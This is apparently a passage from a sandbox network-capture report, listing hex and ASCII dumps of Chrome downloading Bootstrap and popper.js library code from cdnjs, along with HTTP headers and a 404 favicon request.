                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 6c 6c 62 61 72 57 69 64 74 68 22 2c 22 5f 63 68 65 63 6b 53 63 72 6f 6c 6c 62 61 72 22 2c 22 5f 73 65 74 53 63 72 6f 6c 6c 62 61 72 22 2c 22 5f 61 64 6a 75 73 74 44 69 61 6c 6f 67 22 2c 22 5f 73 65 74 45 73 63 61 70 65 45 76 65 6e 74 22 2c 22 5f 73 65 74 52 65 73 69 7a 65 45 76 65 6e 74 22 2c 22 5f 73 68 6f 77 42 61 63 6b 64 72 6f 70 22 2c 22 5f 73 68 6f 77 45 6c 65 6d 65 6e 74 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 22 2c 22 5f 68 69 64 65 4d 6f 64 61 6c 22 2c 22 68 61 6e 64 6c 65 55 70 64 61 74 65 22 2c 22 4e 6f 64 65 22 2c 22 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 22 2c 22 61 70 70 65 6e 64 43 68 69 6c 64 22 2c 22 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 22 2c 22 73 63 72 6f 6c 6c 54 6f 70 22 2c 22 5f 65 6e 66 6f 72 63 65 46 6f 63 75 73 22 2c 22 73 68
                                                                                                                  Data Ascii: llbarWidth","_checkScrollbar","_setScrollbar","_adjustDialog","_setEscapeEvent","_setResizeEvent","_showBackdrop","_showElement","transition","_hideModal","handleUpdate","Node","ELEMENT_NODE","appendChild","removeAttribute","scrollTop","_enforceFocus","sh
                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 22 6f 72 69 67 69 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 22 2c 22 5f 68 61 6e 64 6c 65 50 6f 70 70 65 72 50 6c 61 63 65 6d 65 6e 74 43 68 61 6e 67 65 22 2c 22 6f 6e 55 70 64 61 74 65 22 2c 22 63 6f 6d 70 6c 65 74 65 22 2c 22 5f 66 69 78 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 70 72 65 76 48 6f 76 65 72 53 74 61 74 65 22 2c 22 5f 63 6c 65 61 6e 54 69 70 43 6c 61 73 73 22 2c 22 67 65 74 54 69 74 6c 65 22 2c 22 73 65 74 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 2c 22 63 6f 6e 74 65 6e 74 22 2c 22 65 6d 70 74 79 22 2c 22 61 70 70 65 6e 64 22 2c 22 74 65 78 74 22 2c 22 66 6f 72 45 61 63 68 22 2c 22 65 76 65 6e 74 49 6e 22 2c 22 65 76 65 6e 74 4f 75 74 22 2c 22 5f 66 69 78 54 69 74 6c 65 22 2c 22 74 69 74 6c 65 54 79 70 65 22 2c 22 24 74 69 70 22 2c 22 74 61 62
                                                                                                                  Data Ascii: "originalPlacement","_handlePopperPlacementChange","onUpdate","complete","_fixTransition","prevHoverState","_cleanTipClass","getTitle","setElementContent","content","empty","append","text","forEach","eventIn","eventOut","_fixTitle","titleType","$tip","tab
                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 2c 47 41 41 41 41 2c 47 41 4b 41 4e 2c 47 41 41 41 41 2c 47 41 57 41 4f 2c 47 43 74 44 57 68 42 2c 47 41 4f 58 43 2c 47 41 45 41 43 2c 47 41 43 41 43 2c 47 41 43 41 4b 2c 47 41 43 41 4a 2c 47 41 4f 41 61 2c 47 41 45 41 5a 2c 47 41 57 41 43 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 57 41 47 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 51 41 53 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 41 41 41 2c 47 41 57 41 50 2c 47 41 51 41 43 2c 47 41 63 41 4f 2c 47 43 72 46 51 6e 42 2c 47 41 4f 52 43 2c 47 41 45 41 43 2c 47 41 43 41 43 2c 47 41 45 41 43 2c 47 41 47 41 4f 2c 47 41 4f 41 43 2c 47 41 4f 41 50 2c 47 41 63 41
                                                                                                                  Data Ascii: ,GAAAA,GAKAN,GAAAA,GAWAO,GCtDWhB,GAOXC,GAEAC,GACAC,GACAK,GACAJ,GAOAa,GAEAZ,GAWAC,GAAAA,GAAAA,GAAAA,GAAAA,GAAAA,GAAAA,GAWAG,GAAAA,GAAAA,GAAAA,GAAAA,GAQAS,GAAAA,GAAAA,GAAAA,GAAAA,GAAAA,GAWAP,GAQAC,GAcAO,GCrFQnB,GAORC,GAEAC,GACAC,GAEAC,GAGAO,GAOAC,GAOAP,GAcA
                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 42 47 2c 4d 41 41 4d 2c 4b 41 41 4b 2c 47 41 76 46 76 42 2c 49 41 79 46 72 42 44 2c 57 41 41 57 46 2c 49 41 4e 54 2c 47 41 53 58 49 2c 4f 41 37 43 57 2c 53 41 36 43 4a 56 2c 47 41 43 4c 2c 4f 41 41 4f 41 2c 45 41 41 51 57 2c 63 41 47 6a 42 6e 42 2c 71 42 41 6a 44 57 2c 53 41 69 44 55 51 2c 47 41 43 6e 42 2f 43 2c 45 41 41 45 2b 43 2c 47 41 41 53 59 2c 51 41 41 51 35 42 2c 49 41 49 72 42 36 42 2c 73 42 41 74 44 57 2c 57 41 75 44 54 2c 4f 41 41 4f 43 2c 51 41 41 51 39 42 2c 49 41 47 6a 42 2b 42 2c 55 41 31 44 57 2c 53 41 30 44 44 43 2c 47 41 43 52 2c 4f 41 41 51 41 2c 45 41 41 49 2c 49 41 41 4d 41 2c 47 41 41 4b 43 2c 55 41 47 7a 42 43 2c 67 42 41 39 44 57 2c 53 41 38 44 4b 43 2c 45 41 41 65 43 2c 45 41 41 51 43 2c 47 41 43 72 43 2c 49 41 41 4b 2c 49 41 41
                                                                                                                  Data Ascii: BG,MAAM,KAAK,GAvFvB,IAyFrBD,WAAWF,IANT,GASXI,OA7CW,SA6CJV,GACL,OAAOA,EAAQW,cAGjBnB,qBAjDW,SAiDUQ,GACnB/C,EAAE+C,GAASY,QAAQ5B,IAIrB6B,sBAtDW,WAuDT,OAAOC,QAAQ9B,IAGjB+B,UA1DW,SA0DDC,GACR,OAAQA,EAAI,IAAMA,GAAKC,UAGzBC,gBA9DW,SA8DKC,EAAeC,EAAQC,GACrC,IAAK,IAA
                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 67 42 2c 75 42 41 41 75 42 43 2c 47 41 43 7a 43 2b 44 2c 47 41 41 61 2c 45 41 55 6a 42 2c 4f 41 52 49 39 44 2c 49 41 43 46 38 44 2c 45 41 41 53 6c 45 2c 53 41 41 53 4d 2c 63 41 41 63 46 2c 49 41 47 37 42 38 44 2c 49 41 43 48 41 2c 45 41 41 53 39 47 2c 45 41 41 45 2b 43 2c 47 41 41 53 67 45 2c 51 41 41 58 2c 49 41 41 75 42 7a 47 2c 47 41 41 6d 42 2c 49 41 47 39 43 77 47 2c 47 41 6e 46 53 54 2c 45 41 73 46 6c 42 49 2c 6d 42 41 74 46 6b 42 2c 53 41 73 46 43 31 44 2c 47 41 43 6a 42 2c 49 41 41 4d 69 45 2c 45 41 41 61 68 48 2c 45 41 41 45 4b 2c 4d 41 41 4d 41 2c 45 41 41 4d 34 46 2c 4f 41 47 6a 43 2c 4f 41 44 41 6a 47 2c 45 41 41 45 2b 43 2c 47 41 41 53 59 2c 51 41 41 51 71 44 2c 47 41 43 5a 41 2c 47 41 31 46 53 58 2c 45 41 36 46 6c 42 4d 2c 65 41 37 46 6b 42
                                                                                                                  Data Ascii: gB,uBAAuBC,GACzC+D,GAAa,EAUjB,OARI9D,IACF8D,EAASlE,SAASM,cAAcF,IAG7B8D,IACHA,EAAS9G,EAAE+C,GAASgE,QAAX,IAAuBzG,GAAmB,IAG9CwG,GAnFST,EAsFlBI,mBAtFkB,SAsFC1D,GACjB,IAAMiE,EAAahH,EAAEK,MAAMA,EAAM4F,OAGjC,OADAjG,EAAE+C,GAASY,QAAQqD,GACZA,GA1FSX,EA6FlBM,eA7FkB
                                                                                                                  2024-10-22 14:08:37 UTC1369INData Raw: 4a 2c 45 41 41 51 2c 43 41 43 5a 38 46 2c 65 41 41 41 41 2c 51 41 41 38 42 68 47 2c 45 41 41 59 4b 2c 45 41 43 31 43 32 48 2c 71 42 41 68 42 49 37 48 2c 45 41 47 4b 2c 53 41 61 71 42 48 2c 45 41 41 59 4b 2c 45 41 41 70 42 2c 51 41 43 53 4c 2c 45 41 41 59 4b 2c 47 41 53 76 43 45 2c 45 41 78 43 65 2c 57 41 79 43 6e 42 2c 53 41 41 41 41 2c 45 41 41 59 71 43 2c 47 41 43 56 5a 2c 4b 41 41 4b 69 45 2c 53 41 41 57 72 44 2c 45 41 31 43 43 2c 49 41 41 41 73 44 2c 45 41 41 41 33 46 2c 45 41 41 41 36 44 2c 55 41 41 41 2c 4f 41 41 41 38 42 2c 45 41 71 44 6e 42 2b 42 2c 4f 41 72 44 6d 42 2c 57 41 73 44 6a 42 2c 49 41 41 49 43 2c 47 41 41 71 42 2c 45 41 43 72 42 43 2c 47 41 41 69 42 2c 45 41 43 66 2f 42 2c 45 41 41 63 76 47 2c 45 41 41 45 6d 43 2c 4b 41 41 4b 69 45 2c
                                                                                                                  Data Ascii: J,EAAQ,CACZ8F,eAAAA,QAA8BhG,EAAYK,EAC1C2H,qBAhBI7H,EAGK,SAaqBH,EAAYK,EAApB,QACSL,EAAYK,GASvCE,EAxCe,WAyCnB,SAAAA,EAAYqC,GACVZ,KAAKiE,SAAWrD,EA1CC,IAAAsD,EAAA3F,EAAA6D,UAAA,OAAA8B,EAqDnB+B,OArDmB,WAsDjB,IAAIC,GAAqB,EACrBC,GAAiB,EACf/B,EAAcvG,EAAEmC,KAAKiE,


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.1649771104.17.24.144432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:39 UTC707OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:39 UTC955INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:39 GMT
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=30672000
                                                                                                                  ETag: W/"5eb03fa9-4af4"
                                                                                                                  Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                  Timing-Allow-Origin: *
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 49559
                                                                                                                  Expires: Sun, 12 Oct 2025 14:08:39 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xvfbti3RSxrjBQw1fD1bSeHq6u5diO%2B4yOls2xs3lqGW3XCUC0tZDpDWOsdVFXcc5v%2FGKXWKfMfmmVbCGK4dwKz5GiNktljzlnFfTIzNpSlvSOjmoXLfDFYzlzl28Z1PRP7AJaZP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15780000
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f84691f2d41-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:39 UTC414INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                  Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27 3a 72 65 74
                                                                                                                  Data Ascii: deType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':ret
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65 72 27 2b 6f
                                                                                                                  Data Ascii: o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['border'+o
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e 28 69 3f 6f
                                                                                                                  Data Ascii: op-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(i?o
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64 74 68 2c 69
                                                                                                                  Data Ascii: .height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.width,i
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e 63 65 3a 74
                                                                                                                  Data Ascii: n('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instance:t
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76 65 3a 21
                                                                                                                  Data Ascii: tions.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passive:!
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 27 65
                                                                                                                  Data Ascii: ===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){return'e
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c
                                                                                                                  Data Ascii: ===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function G(e,
                                                                                                                  2024-10-22 14:08:39 UTC1369INData Raw: 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 2c 74 29 4f
                                                                                                                  Data Ascii: &&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o],t)O


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.1649770104.17.24.144432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:39 UTC640OUTGET /favicon.ico HTTP/1.1
                                                                                                                  Host: cdnjs.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:39 UTC722INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:39 GMT
                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                  Content-Length: 18
                                                                                                                  Connection: close
